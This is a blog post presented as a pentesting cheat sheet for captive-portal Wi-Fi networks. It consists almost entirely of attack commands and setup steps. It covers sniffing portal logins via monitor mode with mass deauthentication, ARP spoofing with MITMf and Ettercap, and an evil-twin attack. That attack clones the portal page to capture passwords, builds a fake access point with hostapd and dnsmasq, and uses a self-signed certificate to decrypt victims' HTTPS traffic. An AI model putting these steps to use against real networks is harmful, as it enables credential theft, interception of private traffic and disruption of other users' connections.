Hacking and PenTesting Captive Portal Enabled Wireless Networks

 Hello all, This is a simple cheat sheet for Hacking/Pentesting Captive Portals Enabled Wireless/Wifi networks

Before Starting the attack, it is recommended to Change your Device MAC Address
Sniffing Capitive Portal Login Information using monitor mode

#Enabling Monitor Mode
#Check the interface name and update it accordingly  
ifconfig wlan0 down 
iwconfig wlan0 mode monitor 
ifconfig wlan0 up 

#Start Sniffing and De-auth the user - so, that we can sniff the traffic
airodump-ng wlan0 
airodump-ng --bssid routermac --channel 12 --write filename wlan0 
aireplay-ng --deauth 1000 -a routermac -c clientmac mon0

#open the captured file in wireshark and view the contents - if the captive portal is in HTTP - you can get plain text password
filters: "http", "post", frame contains user
Sniffing Capitive Portal Login Information using ARP Spoofing 

#fid your gateway address
ip r 

#start the attack using MITMf
mitmf --arp --spoof i wlan0 --gateway 

#Start Attack using Ettercap
ettercap -Tq -M arp:remote -i wlan0
Sniffing Capitive Portal Login Information using Social Engineering

follow the below process, or you can go though Evil Twin Attack via Linset

#Create a fake Captive Portal Page
--> open capitive portal, then right click --> save page as --> save the html page
--> go to "var/www/html" and paste the saved html pages and files 
--> change the mainpage to index.html 
--> start web server #service apache2 start 
--> apt-get instal geany  (optional)
--> open the index.html page in text editor and fix relative url's
--> add a "/" before the link <link href="/sd/sd/s/style.css"
--> make sure input boxes are in "form" tag. if not add manually <form> </form>
--> <form method="post" action="/index.html"> inputs and login </form>
--> add a submit button or text to receive  <input type="submit" value="Log in">
--> add a button with the same style

#Creating a Fake AP with Same name
1. A router broadcasting signal -- > wifi card with hostpad
2. A DHCP server to give IP's to clients --> use dnsmasq
3. A DNS Server to handle dns requests --> use dnsmasq

apt-get install hostapd dnsmasq	
service network-manager stop 
--> network is disabled
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

--> need a dnsmasq.conf file 
#set the wifi interface 

#set the IP range that can be given to clients

#get the gatway IP address

#Set dns server address

#Redirect all requests to

--> save it as dnsmasq.conf

--> we need hostpd.conf file as well 

#set wifi interface 

#set network name
ssid=Network Name 2

#set channel 

#ser driver

--> save it as hostpd.conf

dnsmasq -C /root/downloads/dsqmasq.conf

--> -B to run it in the background 

hostapd -C /root/downloads/hostapd.conf -B 

ifconfig wlan0 netmask
service apache2 start 
leafpad /etc/apache2/sites-enables/000-default.conf
--> need to add a rule, so that anypage accessed should be redirect to our addres
--> type in the 000-default.conf file. This is done to redirect any request for a www website to the 
same website without www
--> after <VirtualHost *:80> type the following
	ErrorDoccument 404 /

--> after </VirtualHost> type
<VirtualHost *:443> 
	SSLEngine On
	SSLCertificateFile /root/Downloads/cert.pem
	SSLCertificateKeyFile /root/Downloads/cert.key


<Directory "/var/www/html"> 
	RewriteEngine On 
	RewriteBase /
	RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
	RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
--> this is for Iphones/smartphones  to redirect 404 page to webroot 
	RewriteCond %{REQUEST_FILENAME} !-f
	RewriteCond %{REQUEST_FILENAME} !-d
	RewriteRule ^(.*)$ / [L,QSA]
--> save this file 
service apache2 restart

#Create a SSL Cert for HTTPS catpive Portals 
openssl req -new -X509 -day 365 -out ert.pem -keyout cert.key
--> enter a password and hit enter
--> it asks for country name: set it to according to your country "EU"
--> State: name
--> City: Name
--> company: Microsoft
--> Unit Name: Networking
--> Common Name: Wifi Name
--> Email: Email
--> Certifate should have been created ...

--> to enable SSL on apache
a2enmod ssl 
leafpad /etc/apache2/ports.conf

#add a line of code in ports.config and save the file
Listen 443

#restart the service
service apache2 restart 

#De-authenticate the users from the original network
airodump-ng --bssid routermac --channel number mon0
aireplay-ng --deauth 100000 -a routermac mon0

#Start Sniffing the traffic
#update the interface accordingly
tshark -i wlan0 -w filename.cap

#Once you think the user is logged in, Open the file in wireshark and go through the traffic 
#if the traffic is encrypted, as you have the cert - you can decrypt the view the data

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment